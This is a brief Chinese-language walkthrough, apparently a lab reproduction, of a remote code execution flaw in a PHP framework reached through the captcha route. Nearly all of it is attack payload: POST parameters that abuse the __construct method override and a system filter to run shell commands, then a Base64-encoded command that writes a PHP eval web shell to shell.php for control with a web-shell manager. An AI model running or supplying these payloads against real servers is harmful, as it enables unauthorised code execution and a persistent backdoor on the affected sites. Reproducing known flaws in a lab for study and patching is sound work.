访问/index.php?s=captcha
页面,会出现如下报错:
执行whoami
查看当前目录
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
写入一句话木马并访问
aaabbb 这里使用Base64 编码:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d > shell.php
可以发现一句话木马已经写入,使用蚁剑等管理工具连接:
查看目录
复现完成